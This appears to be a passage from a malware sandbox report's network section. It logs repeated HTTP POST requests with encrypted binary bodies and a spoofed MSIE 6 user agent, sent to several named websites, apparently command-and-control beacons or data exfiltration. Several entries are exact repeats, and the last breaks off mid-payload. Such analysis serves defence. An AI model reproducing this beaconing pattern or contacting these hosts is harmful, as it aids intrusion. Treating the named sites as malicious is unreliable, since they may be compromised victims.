                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 69 35 55 78 78 64 4d 44 7a 51 36 6a 6c 65 64 47 6d 6a 66 35 43 33 79 42 4c 34 57 35 42 6e 48 46 74 30 5a 47 52 57 66 33 4a 4b 2b 69 56 69 6b 46 47 2b 59 45 6b 4a 4b 69 2f 49 50 63 59 54 54 56 56 46 77 52 6a 73 6c 67 70 4c 6c 72 67 6d 75 67 43 47 64 55 69 34 77 64 79 4b 66 75 36 54 45 34 73 57 41 39 31 4d 64 7a 38 6b 41 75 67 47 32 53 4f 46 69 71 68 69 41 79 78 32 36 33 6b 6b 7a 59 44 53 6d 63 7a 55 55 56 4a 74 32 33 32 46 63 73 37 31 37 58 49 68 42 6c 67 57 36 4a 41 6c 4c 68 6c 66 47 6b 50 64 49 34 50 66 7a 6b 31 36 58 63 59 4e 78 35 7a 6d 58 50 46 6f 52 55 6b 59 4b 2f 67 78 4d 4a 48 6d 37 2b 6f 58 6e 2b 59 56 2f 33 78 53 4c 59 4a 32 56 79 6d 39 4f 59 45 35 54 35 63 33 49 45 48 5a 6d 2b 6e 70 6e 49 6d 73 64 31 7a 50 73 66 30 34 4e 6a 76 4b 54 52 73 6a 44 50 70 7a 63 51 59 70 72 52 50 6b 68 4f 6d 6c 4d 5a 76 4f 34 70 7a 32 54 36 7a 36 2f 50 4e 70 36 4b 5a 61 6c 36 54 66 70 69 46 4b 41 4f 46 72 33 66 59 4e 52 65 47 73 44 44 5a 76 73 66 66 4a 32 2b 6c 4b 51 68 56 51 78 6e 6b 31 2f 34 4f 74 6b 2b 4e 78 70 35 79 37 50 66 41 5a 51 41 7a 74 78 4f 34 57 6d 6c 6b 49 44 68 4d 62 30 4a 56 37 67 50 71 76 30 76 53 62 51 78 34 49 71 6a 63 58 36 67 65 56 61 33 33 76 4d 72 67 42 73 6f 78 50 73 34 6c 6c 35 39 70 6e 38 2f 58 66 37 4a 61 64 72 67 53 43 38 33 4a 34 6a 65 72 6a 66 71 70 77 68 2f 63 5a 4b 44 4b 68 55 79 44 6c 6f 6a 52 47 56 49 4f 6a 35 70 31 75 75 43 64 42 42 30 70 67 33 69 71 58 56 49 63 4e 50 58 41 74 33 74 4c 63 32 6f 2f 69 56 55 41 4c 65 6f 56 42 48 75 38 42 4a 79 6a 68 48 4b 6f 41 6d 54 36 57 42 51 49 45 73 74 42 67 44 77 4e 64 70 38 65 77 6a 69 49 4c 58 78 43 45 68 74 58 73 7a 72 36 73 78 74 6c 6d 57 4e Data Ascii: i5UxxdMDzQ6jledGmjf5C3yBL4W5BnHFt0ZGRWf3JK+iVikFG+YEkJKi/IPcYTTVVFwRjslgpLlrgmugCGdUi4wdyKfu6TE4sWA91Mdz8kAugG2SOFiqhiAyx263kkzYDSmczUUVJt232Fcs717XIhBlgW6JAlLhlfGkPdI4Pfzk16XcYNx5zmXPFoRUkYK/gxMJHm7+oXn+YV/3xSLYJ2Vym9OYE5T5c3IEHZm+npnImsd1zPsf04NjvKTRsjDPpzcQYprRPkhOmlMZvO4pz2T6z6/PNp6KZal6TfpiFKAOFr3fYNReGsDDZvsffJ2+lKQhVQxnk1/4Otk+Nxp5y7PfAZQAztxO4WmlkIDhMb0JV7gPqv0vSbQx4IqjcX6geVa33vMrgBsoxPs4ll59pn8/Xf7JadrgSC83J4jerjfqpwh/cZKDKhUyDlojRGVIOj5p1uuCdBB0pg3iqXVIcNPXAt3tLc2o/iVUALeoVBHu8BJyjhHKoAmT6WBQIEstBgDwNdp8ewjiILXxCEhtXszr6sxtlmWN
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 4d 70 44 6f 4a 70 2f 51 34 41 34 61 6b 2b 65 47 2f 75 56 2f 38 43 67 45 65 39 42 31 38 53 4e 78 51 31 4b 31 4a 6b 7a 44 4a 30 32 70 44 72 67 67 65 7a 52 35 6b 69 71 43 46 68 35 4e 56 36 5a 54 47 63 76 4e 4f 63 68 58 6e 57 56 62 72 59 52 75 57 77 4b 6d 69 4d 74 76 32 37 54 58 4f 61 47 74 6f 46 64 78 57 52 49 76 46 2f 50 4b 6c 58 53 62 70 56 47 52 65 71 67 65 46 53 4d 6c 6c 4f 6c 74 39 4d 41 78 47 39 37 7a 64 54 4c 70 46 62 78 55 6d 44 37 44 50 58 49 71 68 6d 51 69 6c 41 6f 65 6a 45 49 2f 47 64 4e 66 2f 36 32 50 44 42 4a 75 59 5a 78 75 51 6b 6d 39 6a 31 6b 46 6a 2f 75 47 77 6a 6f 47 44 6e 5a 37 43 34 31 57 6f 35 43 79 33 7a 4e 4b 71 4c 46 6a 51 6e 5a 31 47 4e 2b 7a 77 6c 67 55 43 63 52 75 4c 4a 51 66 59 67 50 2f 2f 39 39 4e 69 74 55 48 74 47 57 57 42 6f 70 79 59 5a 30 79 46 6f 65 55 70 50 56 4d 33 6f 47 78 69 49 45 6b 43 35 6a 35 6b 57 74 74 6e 63 5a 38 52 45 68 4f 56 75 59 42 44 48 67 6e 63 45 6a 5a 75 68 47 67 4a 39 63 34 41 5a 79 2f 57 69 77 37 75 6d 75 44 62 33 36 31 68 34 35 55 45 39 42 69 39 38 63 54 61 79 73 68 70 43 45 79 64 4e 4f 37 68 33 70 45 44 78 49 4a 56 43 70 44 63 4b 37 79 5a 64 31 38 66 73 47 50 62 33 4a 48 70 68 78 55 6b 34 4a 75 74 6d 62 4b 6b 6b 73 65 6a 68 31 6f 63 2b 75 55 53 32 53 41 76 37 74 6b 50 32 4c 61 33 78 4e 43 38 30 44 74 35 69 41 37 32 48 33 6f 34 44 6d 4c 38 71 6e 77 52 4c 50 62 66 6f 45 77 70 49 39 53 4c 61 53 35 51 5a 5a 56 77 52 42 31 41 68 38 49 57 34 34 64 71 70 4d 34 4e 38 79 6f 37 41 32 71 67 34 31 6e 74 6d 6c 39 43 79 32 4a 5a 6b 6c 37 39 46 56 6c 6d 71 59 49 48 4f 68 59 6b 74 43 54 50 48 5a 42 70 51 75 61 61 44 79 57 74 6a 73 30 4f 35 72 46 6f 71 71 41 4c 74 6b 59 58 53 31 6d 62 32 47 30 38 33 72 52 4c 59 5a 5a 4a 59 4f 63 6f 31 4e 2f 6e 67 59 45 7a 53 4e 42 2b 61 34 3d Data Ascii: MpDoJp/Q4A4ak+eG/uV/8CgEe9B18SNxQ1K1JkzDJ02pDrggezR5kiqCFh5NV6ZTGcvNOchXnWVbrYRuWwKmiMtv27TXOaGtoFdxWRIvF/PKlXSbpVGReqgeFSMllOlt9MAxG97zdTLpFbxUmD7DPXIqhmQilAoejEI/GdNf/62PDBJuYZxuQkm9j1kFj/uGwjoGDnZ7C41Wo5Cy3zNKqLFjQnZ1GN+zwlgUCcRuLJQfYgP//99NitUHtGWWBopyYZ0yFoeUpPVM3oGxiIEkC5j5kWttncZ8REhOVuYBDHgncEjZuhGgJ9c4AZy/Wiw7umuDb361h45UE9Bi98cTayshpCEydNO7h3pEDxIJVCpDcK7yZd18fsGPb3JHphxUk4JutmbKkksejh1oc+uUS2SAv7tkP2La3xNC80Dt5iA72H3o4DmL8qnwRLPbfoEwpI9SLaS5QZZVwRB1Ah8IW44dqpM4N8yo7A2qg41ntml9Cy2JZkl79FVlmqYIHOhYktCTPHZBpQuaaDyWtjs0O5rFoqqALtkYXS1mb2G083rRLYZZJYOco1N/ngYEzSNB+a4=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 4d 70 44 6f 4a 70 2f 51 34 41 34 61 6b 2b 65 47 2f 75 56 2f 38 43 67 45 65 39 42 31 38 53 4e 78 51 31 4b 31 4a 6b 7a 44 4a 30 32 70 44 72 67 67 65 7a 52 35 6b 69 71 43 46 68 35 4e 56 36 5a 54 47 63 76 4e 4f 63 68 58 6e 57 56 62 72 59 52 75 57 77 4b 6d 69 4d 74 76 32 37 54 58 4f 61 47 74 6f 46 64 78 57 52 49 76 46 2f 50 4b 6c 58 53 62 70 56 47 52 65 71 67 65 46 53 4d 6c 6c 4f 6c 74 39 4d 41 78 47 39 37 7a 64 54 4c 70 46 62 78 55 6d 44 37 44 50 58 49 71 68 6d 51 69 6c 41 6f 65 6a 45 49 2f 47 64 4e 66 2f 36 32 50 44 42 4a 75 59 5a 78 75 51 6b 6d 39 6a 31 6b 46 6a 2f 75 47 77 6a 6f 47 44 6e 5a 37 43 34 31 57 6f 35 43 79 33 7a 4e 4b 71 4c 46 6a 51 6e 5a 31 47 4e 2b 7a 77 6c 67 55 43 63 52 75 4c 4a 51 66 59 67 50 2f 2f 39 39 4e 69 74 55 48 74 47 57 57 42 6f 70 79 59 5a 30 79 46 6f 65 55 70 50 56 4d 33 6f 47 78 69 49 45 6b 43 35 6a 35 6b 57 74 74 6e 63 5a 38 52 45 68 4f 56 75 59 42 44 48 67 6e 63 45 6a 5a 75 68 47 67 4a 39 63 34 41 5a 79 2f 57 69 77 37 75 6d 75 44 62 33 36 31 68 34 35 55 45 39 42 69 39 38 63 54 61 79 73 68 70 43 45 79 64 4e 4f 37 68 33 70 45 44 78 49 4a 56 43 70 44 63 4b 37 79 5a 64 31 38 66 73 47 50 62 33 4a 48 70 68 78 55 6b 34 4a 75 74 6d 62 4b 6b 6b 73 65 6a 68 31 6f 63 2b 75 55 53 32 53 41 76 37 74 6b 50 32 4c 61 33 78 4e 43 38 30 44 74 35 69 41 37 32 48 33 6f 34 44 6d 4c 38 71 6e 77 52 4c 50 62 66 6f 45 77 70 49 39 53 4c 61 53 35 51 5a 5a 56 77 52 42 31 41 68 38 49 57 34 34 64 71 70 4d 34 4e 38 79 6f 37 41 32 71 67 34 31 6e 74 6d 6c 39 43 79 32 4a 5a 6b 6c 37 39 46 56 6c 6d 71 59 49 48 4f 68 59 6b 74 43 54 50 48 5a 42 70 51 75 61 61 44 79 57 74 6a 73 30 4f 35 72 46 6f 71 71 41 4c 74 6b 59 58 53 31 6d 62 32 47 30 38 33 72 52 4c 59 5a 5a 4a 59 4f 63 6f 31 4e 2f 6e 67 59 45 7a 53 4e 42 2b 61 34 3d Data Ascii: MpDoJp/Q4A4ak+eG/uV/8CgEe9B18SNxQ1K1JkzDJ02pDrggezR5kiqCFh5NV6ZTGcvNOchXnWVbrYRuWwKmiMtv27TXOaGtoFdxWRIvF/PKlXSbpVGReqgeFSMllOlt9MAxG97zdTLpFbxUmD7DPXIqhmQilAoejEI/GdNf/62PDBJuYZxuQkm9j1kFj/uGwjoGDnZ7C41Wo5Cy3zNKqLFjQnZ1GN+zwlgUCcRuLJQfYgP//99NitUHtGWWBopyYZ0yFoeUpPVM3oGxiIEkC5j5kWttncZ8REhOVuYBDHgncEjZuhGgJ9c4AZy/Wiw7umuDb361h45UE9Bi98cTayshpCEydNO7h3pEDxIJVCpDcK7yZd18fsGPb3JHphxUk4JutmbKkksejh1oc+uUS2SAv7tkP2La3xNC80Dt5iA72H3o4DmL8qnwRLPbfoEwpI9SLaS5QZZVwRB1Ah8IW44dqpM4N8yo7A2qg41ntml9Cy2JZkl79FVlmqYIHOhYktCTPHZBpQuaaDyWtjs0O5rFoqqALtkYXS1mb2G083rRLYZZJYOco1N/ngYEzSNB+a4=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 63 6b 57 55 78 36 63 58 7a 51 34 76 35 66 49 48 56 72 43 55 41 33 44 49 76 4f 34 64 4b 62 64 5a 79 38 31 71 4b 6b 39 63 4e 4a 31 52 4f 58 39 4f 62 56 4c 36 39 64 79 66 47 44 4c 59 33 44 6f 52 4a 6c 66 66 74 56 44 74 44 70 43 48 71 65 36 72 75 49 62 45 4e 46 2f 68 42 47 52 5a 5a 63 4d 4d 70 6e 6f 2f 6f 54 6c 55 33 6e 70 49 35 31 49 49 62 35 6b 63 44 46 6d 73 69 5a 64 77 50 78 73 54 4d 61 6f 48 61 63 57 67 6a 73 42 6e 50 52 46 37 43 78 56 4c 54 79 68 70 72 47 59 65 76 52 53 32 73 6b 33 46 62 6f 32 30 31 58 78 30 4b 4a 4f 54 52 49 37 50 68 6c 4e 4d 35 67 65 68 4a 35 2f 59 4e 51 35 38 5a 6b 4d 76 79 31 34 52 50 38 47 72 59 74 4e 58 56 44 33 51 4e 52 68 43 2f 6d 68 38 55 37 44 46 6c 2f 43 37 2f 78 4d 30 6c 37 4a 78 44 42 31 78 78 47 34 70 30 6b 75 58 57 58 58 72 53 68 68 66 79 78 56 69 51 64 56 6a 31 76 4b 4e 63 4e 75 71 51 67 74 33 6d 43 6c 6b 4b 49 35 56 67 52 64 33 54 74 36 33 66 55 5a 37 7a 33 47 39 47 70 6f 51 77 48 36 66 64 76 6c 6d 2f 50 6a 57 44 71 57 37 32 73 66 74 54 34 6a 57 79 64 6a 6f 38 53 50 6a 75 54 42 34 68 68 2f 6f 4a 74 36 48 6f 4d 51 51 67 57 2f 4c 48 2b 4f 4f 50 75 6f 6d 64 4e 79 48 4b 4b 67 52 52 68 72 48 70 55 71 42 4f 6e 78 43 64 78 36 67 71 47 76 43 46 54 50 4b 57 62 62 4e 74 64 72 71 36 54 6d 61 5a 36 74 6d 2b 6b 6e 33 32 43 56 32 41 61 51 39 42 71 34 65 53 47 34 32 72 45 79 66 63 45 4e 67 78 2b 41 53 70 6b 34 4a 6b 44 65 37 6b 59 6c 78 6e 61 70 69 52 6a 47 6f 56 50 37 71 35 32 48 78 70 62 36 31 38 62 71 65 47 32 2f 55 36 36 44 61 4f 48 59 48 2f 66 2b 5a 42 78 52 44 63 36 6b 6a 6c 78 4f 41 68 54 52 64 4b 6c 63 75 34 78 50 71 34 32 47 64 34 30 43 54 51 62 7a 42 38 71 73 44 57 45 7a 68 59 54 56 34 Data Ascii: ckWUx6cXzQ4v5fIHVrCUA3DIvO4dKbdZy81qKk9cNJ1ROX9ObVL69dyfGDLY3DoRJlfftVDtDpCHqe6ruIbENF/hBGRZZcMMpno/oTlU3npI51IIb5kcDFmsiZdwPxsTMaoHacWgjsBnPRF7CxVLTyhprGYevRS2sk3Fbo201Xx0KJOTRI7PhlNM5gehJ5/YNQ58ZkMvy14RP8GrYtNXVD3QNRhC/mh8U7DFl/C7/xM0l7JxDB1xxG4p0kuXWXXrShhfyxViQdVj1vKNcNuqQgt3mClkKI5VgRd3Tt63fUZ7z3G9GpoQwH6fdvlm/PjWDqW72sftT4jWydjo8SPjuTB4hh/oJt6HoMQQgW/LH+OOPuomdNyHKKgRRhrHpUqBOnxCdx6gqGvCFTPKWbbNtdrq6TmaZ6tm+kn32CV2AaQ9Bq4eSG42rEyfcENgx+ASpk4JkDe7kYlxnapiRjGoVP7q52Hxpb618bqeG2/U66DaOHYH/f+ZBxRDc6kjlxOAhTRdKlcu4xPq42Gd40CTQbzB8qsDWEzhYTV4
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 63 6b 57 55 78 36 63 58 7a 51 34 76 35 66 49 48 56 72 43 55 41 33 44 49 76 4f 34 64 4b 62 64 5a 79 38 31 71 4b 6b 39 63 4e 4a 31 52 4f 58 39 4f 62 56 4c 36 39 64 79 66 47 44 4c 59 33 44 6f 52 4a 6c 66 66 74 56 44 74 44 70 43 48 71 65 36 72 75 49 62 45 4e 46 2f 68 42 47 52 5a 5a 63 4d 4d 70 6e 6f 2f 6f 54 6c 55 33 6e 70 49 35 31 49 49 62 35 6b 63 44 46 6d 73 69 5a 64 77 50 78 73 54 4d 61 6f 48 61 63 57 67 6a 73 42 6e 50 52 46 37 43 78 56 4c 54 79 68 70 72 47 59 65 76 52 53 32 73 6b 33 46 62 6f 32 30 31 58 78 30 4b 4a 4f 54 52 49 37 50 68 6c 4e 4d 35 67 65 68 4a 35 2f 59 4e 51 35 38 5a 6b 4d 76 79 31 34 52 50 38 47 72 59 74 4e 58 56 44 33 51 4e 52 68 43 2f 6d 68 38 55 37 44 46 6c 2f 43 37 2f 78 4d 30 6c 37 4a 78 44 42 31 78 78 47 34 70 30 6b 75 58 57 58 58 72 53 68 68 66 79 78 56 69 51 64 56 6a 31 76 4b 4e 63 4e 75 71 51 67 74 33 6d 43 6c 6b 4b 49 35 56 67 52 64 33 54 74 36 33 66 55 5a 37 7a 33 47 39 47 70 6f 51 77 48 36 66 64 76 6c 6d 2f 50 6a 57 44 71 57 37 32 73 66 74 54 34 6a 57 79 64 6a 6f 38 53 50 6a 75 54 42 34 68 68 2f 6f 4a 74 36 48 6f 4d 51 51 67 57 2f 4c 48 2b 4f 4f 50 75 6f 6d 64 4e 79 48 4b 4b 67 52 52 68 72 48 70 55 71 42 4f 6e 78 43 64 78 36 67 71 47 76 43 46 54 50 4b 57 62 62 4e 74 64 72 71 36 54 6d 61 5a 36 74 6d 2b 6b 6e 33 32 43 56 32 41 61 51 39 42 71 34 65 53 47 34 32 72 45 79 66 63 45 4e 67 78 2b 41 53 70 6b 34 4a 6b 44 65 37 6b 59 6c 78 6e 61 70 69 52 6a 47 6f 56 50 37 71 35 32 48 78 70 62 36 31 38 62 71 65 47 32 2f 55 36 36 44 61 4f 48 59 48 2f 66 2b 5a 42 78 52 44 63 36 6b 6a 6c 78 4f 41 68 54 52 64 4b 6c 63 75 34 78 50 71 34 32 47 64 34 30 43 54 51 62 7a 42 38 71 73 44 57 45 7a 68 59 54 56 34 Data Ascii: ckWUx6cXzQ4v5fIHVrCUA3DIvO4dKbdZy81qKk9cNJ1ROX9ObVL69dyfGDLY3DoRJlfftVDtDpCHqe6ruIbENF/hBGRZZcMMpno/oTlU3npI51IIb5kcDFmsiZdwPxsTMaoHacWgjsBnPRF7CxVLTyhprGYevRS2sk3Fbo201Xx0KJOTRI7PhlNM5gehJ5/YNQ58ZkMvy14RP8GrYtNXVD3QNRhC/mh8U7DFl/C7/xM0l7JxDB1xxG4p0kuXWXXrShhfyxViQdVj1vKNcNuqQgt3mClkKI5VgRd3Tt63fUZ7z3G9GpoQwH6fdvlm/PjWDqW72sftT4jWydjo8SPjuTB4hh/oJt6HoMQQgW/LH+OOPuomdNyHKKgRRhrHpUqBOnxCdx6gqGvCFTPKWbbNtdrq6TmaZ6tm+kn32CV2AaQ9Bq4eSG42rEyfcENgx+ASpk4JkDe7kYlxnapiRjGoVP7q52Hxpb618bqeG2/U66DaOHYH/f+ZBxRDc6kjlxOAhTRdKlcu4xPq42Gd40CTQbzB8qsDWEzhYTV4
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 4a 50 34 65 32 61 34 36 39 77 36 30 5a 45 35 64 75 55 4a 63 4f 78 46 73 72 48 6b 75 67 70 72 64 77 6a 55 79 46 55 61 47 67 6d 59 37 76 6f 6d 42 38 42 67 31 6f 4e 34 46 77 57 4c 6c 34 64 58 51 36 35 34 6a 69 53 79 36 58 39 73 2b 36 62 52 4e 33 2f 6e 4e 4f 4b 78 53 58 44 6a 51 43 79 6e 6c 45 4a 6c 74 75 42 76 54 2b 61 68 62 63 64 4c 31 6d 6d 36 6f 5a 44 2f 67 79 4d 67 51 5a 56 71 7a 4a 31 36 6a 54 56 55 34 2f 39 34 2f 30 6e 59 31 4f 54 38 63 56 4f 77 2f 79 66 32 57 6e 63 6d 43 55 39 54 6f 49 34 37 69 6b 6f 65 70 46 59 33 31 6e 4b 67 6c 74 7a 34 55 6e 4d 67 6c 65 71 2f 50 79 54 74 74 79 76 47 78 30 63 67 4e 77 79 54 31 34 70 35 58 44 61 6d 63 6e 6a 69 61 4b 63 47 61 32 31 4f 35 35 72 41 5a 6b 6e 41 51 7a 44 47 68 4a 4a 6e 5a 58 36 36 6a 6a 4b 50 7a 59 6d 2b 4c 68 46 4c 53 37 4c 69 70 49 79 52 6b 74 67 31 38 53 78 5a 6c 37 76 66 63 55 4c 50 5a 6e 50 39 38 5a 55 4b 56 74 51 69 4a 46 66 73 73 52 66 75 69 53 42 6f 65 37 4a 62 5a 43 58 6c 53 71 6a 6c 67 2f 7a 6b 39 74 64 32 65 53 65 47 65 2b 4a 66 47 54 63 6a 42 66 61 68 52 6e 62 4b 45 71 52 6d 34 76 69 58 55 4c 76 56 37 57 4d 43 64 6f 77 2f 75 6c 43 47 61 4a 42 75 4e 4f 78 56 42 79 44 57 55 41 41 76 31 63 57 78 71 66 72 4a 75 68 6d 34 56 59 63 33 4f 38 31 71 70 4c 64 47 31 4d 6a 71 4b 72 73 76 56 33 58 63 62 6c 50 62 6a 38 4d 4b 71 6f 52 55 61 77 4f 54 30 48 78 6f 4d 71 4a 4e 6f 30 44 2f 53 66 4c 55 43 31 47 5a 2b 42 67 46 6f 77 49 6b 32 39 38 63 30 31 5a 47 43 30 47 70 68 4f 4b 37 69 31 5a 56 77 74 6c 49 4f 4a 74 49 6a 45 59 48 4d 63 6b 74 37 42 49 55 76 4d 2f 54 71 4e 58 47 2b 6a 50 33 6e 45 35 6e 72 61 63 52 65 75 67 64 42 72 67 52 77 4b 57 44 62 58 54 31 78 2f 43 61 4d 79 42 47 78 33 57 7a 61 74 33 30 45 4b 67 48 6d 6c 46 69 6e 52 35 61 35 53 68 64 75 4d 4b 47 65 33 77 3d 3d Data Ascii: JP4e2a469w60ZE5duUJcOxFsrHkugprdwjUyFUaGgmY7vomB8Bg1oN4FwWLl4dXQ654jiSy6X9s+6bRN3/nNOKxSXDjQCynlEJltuBvT+ahbcdL1mm6oZD/gyMgQZVqzJ16jTVU4/94/0nY1OT8cVOw/yf2WncmCU9ToI47ikoepFY31nKgltz4UnMgleq/PyTttyvGx0cgNwyT14p5XDamcnjiaKcGa21O55rAZknAQzDGhJJnZX66jjKPzYm+LhFLS7LipIyRktg18SxZl7vfcULPZnP98ZUKVtQiJFfssRfuiSBoe7JbZCXlSqjlg/zk9td2eSeGe+JfGTcjBfahRnbKEqRm4viXULvV7WMCdow/ulCGaJBuNOxVByDWUAAv1cWxqfrJuhm4VYc3O81qpLdG1MjqKrsvV3XcblPbj8MKqoRUawOT0HxoMqJNo0D/SfLUC1GZ+BgFowIk298c01ZGC0GphOK7i1ZVwtlIOJtIjEYHMckt7BIUvM/TqNXG+jP3nE5nracReugdBrgRwKWDbXT1x/CaMyBGx3Wzat30EKgHmlFinR5a5ShduMKGe3w==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 4a 50 34 65 32 61 34 36 39 77 36 30 5a 45 35 64 75 55 4a 63 4f 78 46 73 72 48 6b 75 67 70 72 64 77 6a 55 79 46 55 61 47 67 6d 59 37 76 6f 6d 42 38 42 67 31 6f 4e 34 46 77 57 4c 6c 34 64 58 51 36 35 34 6a 69 53 79 36 58 39 73 2b 36 62 52 4e 33 2f 6e 4e 4f 4b 78 53 58 44 6a 51 43 79 6e 6c 45 4a 6c 74 75 42 76 54 2b 61 68 62 63 64 4c 31 6d 6d 36 6f 5a 44 2f 67 79 4d 67 51 5a 56 71 7a 4a 31 36 6a 54 56 55 34 2f 39 34 2f 30 6e 59 31 4f 54 38 63 56 4f 77 2f 79 66 32 57 6e 63 6d 43 55 39 54 6f 49 34 37 69 6b 6f 65 70 46 59 33 31 6e 4b 67 6c 74 7a 34 55 6e 4d 67 6c 65 71 2f 50 79 54 74 74 79 76 47 78 30 63 67 4e 77 79 54 31 34 70 35 58 44 61 6d 63 6e 6a 69 61 4b 63 47 61 32 31 4f 35 35 72 41 5a 6b 6e 41 51 7a 44 47 68 4a 4a 6e 5a 58 36 36 6a 6a 4b 50 7a 59 6d 2b 4c 68 46 4c 53 37 4c 69 70 49 79 52 6b 74 67 31 38 53 78 5a 6c 37 76 66 63 55 4c 50 5a 6e 50 39 38 5a 55 4b 56 74 51 69 4a 46 66 73 73 52 66 75 69 53 42 6f 65 37 4a 62 5a 43 58 6c 53 71 6a 6c 67 2f 7a 6b 39 74 64 32 65 53 65 47 65 2b 4a 66 47 54 63 6a 42 66 61 68 52 6e 62 4b 45 71 52 6d 34 76 69 58 55 4c 76 56 37 57 4d 43 64 6f 77 2f 75 6c 43 47 61 4a 42 75 4e 4f 78 56 42 79 44 57 55 41 41 76 31 63 57 78 71 66 72 4a 75 68 6d 34 56 59 63 33 4f 38 31 71 70 4c 64 47 31 4d 6a 71 4b 72 73 76 56 33 58 63 62 6c 50 62 6a 38 4d 4b 71 6f 52 55 61 77 4f 54 30 48 78 6f 4d 71 4a 4e 6f 30 44 2f 53 66 4c 55 43 31 47 5a 2b 42 67 46 6f 77 49 6b 32 39 38 63 30 31 5a 47 43 30 47 70 68 4f 4b 37 69 31 5a 56 77 74 6c 49 4f 4a 74 49 6a 45 59 48 4d 63 6b 74 37 42 49 55 76 4d 2f 54 71 4e 58 47 2b 6a 50 33 6e 45 35 6e 72 61 63 52 65 75 67 64 42 72 67 52 77 4b 57 44 62 58 54 31 78 2f 43 61 4d 79 42 47 78 33 57 7a 61 74 33 30 45 4b 67 48 6d 6c 46 69 6e 52 35 61 35 53 68 64 75 4d 4b 47 65 33 77 3d 3d Data Ascii: JP4e2a469w60ZE5duUJcOxFsrHkugprdwjUyFUaGgmY7vomB8Bg1oN4FwWLl4dXQ654jiSy6X9s+6bRN3/nNOKxSXDjQCynlEJltuBvT+ahbcdL1mm6oZD/gyMgQZVqzJ16jTVU4/94/0nY1OT8cVOw/yf2WncmCU9ToI47ikoepFY31nKgltz4UnMgleq/PyTttyvGx0cgNwyT14p5XDamcnjiaKcGa21O55rAZknAQzDGhJJnZX66jjKPzYm+LhFLS7LipIyRktg18SxZl7vfcULPZnP98ZUKVtQiJFfssRfuiSBoe7JbZCXlSqjlg/zk9td2eSeGe+JfGTcjBfahRnbKEqRm4viXULvV7WMCdow/ulCGaJBuNOxVByDWUAAv1cWxqfrJuhm4VYc3O81qpLdG1MjqKrsvV3XcblPbj8MKqoRUawOT0HxoMqJNo0D/SfLUC1GZ+BgFowIk298c01ZGC0GphOK7i1ZVwtlIOJtIjEYHMckt7BIUvM/TqNXG+jP3nE5nracReugdBrgRwKWDbXT1x/CaMyBGx3Wzat30EKgHmlFinR5a5ShduMKGe3w==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 55 70 31 79 63 50 52 30 42 41 38 30 6d 6e 6e 37 54 78 73 57 4d 6b 63 4d 71 55 7a 73 2b 49 72 68 61 42 6c 62 44 5a 4f 2f 70 36 4c 38 33 45 56 74 6e 78 76 58 65 65 61 4e 64 72 72 57 36 77 66 66 5a 49 75 4a 5a 2f 67 77 57 37 48 69 79 73 7a 35 4b 71 38 6a 51 37 76 53 71 68 71 56 78 59 41 71 43 59 45 44 64 6f 78 4a 66 6e 5a 73 62 6a 41 51 6b 4b 61 7a 62 74 44 78 64 44 30 35 4a 74 4e 75 73 31 6f 32 74 5a 52 2f 68 74 6c 64 62 64 48 68 46 55 6f 70 6a 45 33 6d 53 71 4c 5a 6e 6a 71 79 4e 68 37 30 61 76 32 68 63 6c 35 6b 6f 6d 6c 79 4b 66 74 76 44 75 6f 39 35 2b 67 32 57 65 75 4a 78 75 55 63 30 74 35 64 42 61 69 55 4b 7a 72 2b 72 71 61 7a 59 2f 30 75 72 36 6b 69 75 36 37 37 55 41 75 36 4a 76 4a 6a 4e 39 6c 33 70 34 77 56 63 79 51 68 34 46 43 7a 6f 56 76 65 41 6c 57 49 30 67 55 4d 64 45 6b 63 4e 51 52 31 42 58 47 5a 35 74 35 76 67 70 78 4f 58 67 39 74 34 34 35 6d 37 46 47 5a 76 44 31 59 71 58 39 58 79 73 6b 69 72 6e 75 72 66 77 5a 5a 56 4d 77 45 6f 50 56 71 39 34 43 56 66 57 4c 76 42 4b 34 6f 31 55 4c 5a 56 77 31 59 51 70 64 52 73 50 2f 45 71 6f 74 38 4e 32 45 42 36 7a 6b 36 69 34 4a 68 58 30 36 56 52 50 45 6e 41 4b 42 34 4f 4e 72 52 75 69 31 50 6b 53 31 30 32 5a 33 71 45 6d 2b 45 45 68 54 4d 44 30 79 32 75 2f 55 56 34 55 74 41 61 52 77 6a 58 6f 6f 56 62 48 61 53 78 7a 7a 57 61 37 35 74 51 45 53 46 6f 73 6d 6a 48 6d 6f 69 58 66 30 4e 6c 2b 64 62 46 41 6e 6b 71 65 49 44 75 56 70 64 34 65 58 32 6c 72 58 45 74 7a 51 4b 4c 6b 68 2b 6e 45 2f 67 74 6d 35 67 67 51 